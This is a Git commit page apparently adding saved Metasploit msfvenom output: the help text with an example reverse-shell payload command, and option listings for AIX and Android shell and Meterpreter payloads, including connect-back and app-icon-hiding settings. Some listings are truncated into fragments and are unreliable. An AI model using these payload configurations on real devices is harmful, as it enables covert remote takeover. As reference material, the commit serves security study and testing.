PrincessPi/android-hackhackin
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

lmao the living hell persists buit so do i :sweetdreams:

Browse Source
This commit is contained in:
Princess Pi
2025-06-27 13:13:03 -06:00
parent 7d1fac90e5
commit 9dbd8f2426
543 changed files with 42450 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
msfvenom/help.txt
+32
View File
@@ -0,0 +1,32 @@
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
msfvenom/payload_options/aix-ppc-shell_bind_tcp.txt
+32
View File
@@ -0,0 +1,32 @@
Name: AIX Command Shell, Bind TCP Inline
Module: payload/aix/ppc/shell_bind_tcp
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 264
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/aix-ppc-shell_find_port.txt
+31
View File
@@ -0,0 +1,31 @@
Name: AIX Command Shell, Find Port Inline
Module: payload/aix/ppc/shell_find_port
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 220
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
CPORT 64342 no The local client port
Description:
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/aix-ppc-shell_interact.txt
+30
View File
@@ -0,0 +1,30 @@
Name: AIX execve Shell for inetd
Module: payload/aix/ppc/shell_interact
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 56
Rank: Normal
Provided by:
jduck <jduck@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
Description:
Simply execve /bin/sh (for inetd programs)
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/aix-ppc-shell_reverse_tcp.txt
+39
View File
@@ -0,0 +1,39 @@
Name: AIX Command Shell, Reverse TCP Inline
Module: payload/aix/ppc/shell_reverse_tcp
Platform: AIX
Arch: ppc
Needs Admin: No
Total size: 204
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AIX 6.1.4 yes IBM AIX Version
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-meterpreter-reverse_http.txt
+74
View File
@@ -0,0 +1,74 @@
Name: Android Meterpreter, Android Reverse HTTP Stager
Module: payload/android/meterpreter/reverse_http
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/meterpreter/reverse_http:
=========================
t.com>
OJ Reeves
anwarelmakrahy
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Run a meterpreter server in Android.
Tunnel communication over HTTP
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-meterpreter-reverse_https.txt
+76
View File
@@ -0,0 +1,76 @@
Name: Android Meterpreter, Android Reverse HTTPS Stager
Module: payload/android/meterpreter/reverse_https
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/meterpreter/reverse_https:
=========================
.com>
OJ Reeves
anwarelmakrahy
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Run a meterpreter server in Android.
Tunnel communication over HTTPS
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-meterpreter-reverse_tcp.txt
+66
View File
@@ -0,0 +1,66 @@
Name: Android Meterpreter, Android Reverse TCP Stager
Module: payload/android/meterpreter/reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 10217
Rank: Normal
Provided by:
mihi
egypt <egypt@metasploit.com>
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in Android.
Connect back stager
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-meterpreter_reverse_http.txt
+58
View File
@@ -0,0 +1,58 @@
Name: Android Meterpreter Shell, Reverse HTTP Inline
Module: payload/android/meterpreter_reverse_http
Platform: Android
Arch: dalvik
Needs Admin: No
Evasion options for payload/android/meterpreter_reverse_http:
=========================
g Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Connect back to attacker and spawn a Meterpreter shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-meterpreter_reverse_https.txt
+60
View File
@@ -0,0 +1,60 @@
Name: Android Meterpreter Shell, Reverse HTTPS Inline
Module: payload/android/meterpreter_reverse_https
Platform: Android
Arch: dalvik
Needs Admin: No
Evasion options for payload/android/meterpreter_reverse_https:
=========================
Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Connect back to attacker and spawn a Meterpreter shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-meterpreter_reverse_tcp.txt
+54
View File
@@ -0,0 +1,54 @@
Name: Android Meterpreter Shell, Reverse TCP Inline
Module: payload/android/meterpreter_reverse_tcp
Platform: Android
Arch: dalvik
Needs Admin: No
Total size: 74177
Rank: Normal
Provided by:
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to the attacker and spawn a Meterpreter shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-shell-reverse_http.txt
+63
View File
@@ -0,0 +1,63 @@
Name: Command Shell, Android Reverse HTTP Stager
Module: payload/android/shell/reverse_http
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/shell/reverse_http:
=========================
asploit.com>
anwarelmakrahy
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Description:
Spawn a piped command shell (sh).
Tunnel communication over HTTP
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/android-shell-reverse_https.txt
+66
View File
@@ -0,0 +1,66 @@
Name: Command Shell, Android Reverse HTTPS Stager
Module: payload/android/shell/reverse_https
Platform: Android
Arch: dalvik
Needs Admin: N
Evasion options for payload/android/shell/reverse_https:
=========================
sploit.com>
anwarelmakrahy
OJ Reeves
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Description:
Spawn a piped command shell (sh).
Tunnel communication over HTTPS
Name Current Setting Required Description
---- --------------- -------- -----------
AndroidHideAppIcon false no Hide the application icon automatically after launch
AndroidMeterpreterDebug false no Run the payload in debug mode, with logging enabled
AndroidWakelock true no Acquire a wakelock before starting the payload
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
HandlerSSLCert no Path to a SSL certificate in unified PEM format
HttpCookie no An optional value to use for the Cookie HTTP header
HttpHostHeader no An optional value to use for the Host HTTP header
HttpReferer no An optional value to use for the Referer HTTP header
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters
